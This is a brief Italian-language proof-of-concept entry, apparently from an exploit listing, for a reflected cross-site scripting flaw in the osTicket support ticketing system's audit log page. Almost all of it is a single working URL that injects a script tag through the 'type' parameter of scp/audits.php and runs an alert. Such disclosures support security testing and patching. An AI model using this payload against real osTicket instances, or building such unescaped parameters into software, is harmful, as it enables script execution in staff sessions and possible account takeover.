
Exploit proof-of-concept di XSS riflessa per il sistema di ticketing di supporto osTicket, che dimostra l'iniezione tramite i parametri del registro di audit.
XSS riflesso
http://localhost/scp/audits.php?startData=&endDate=&type="><script>alert('reflectedXSS')</script>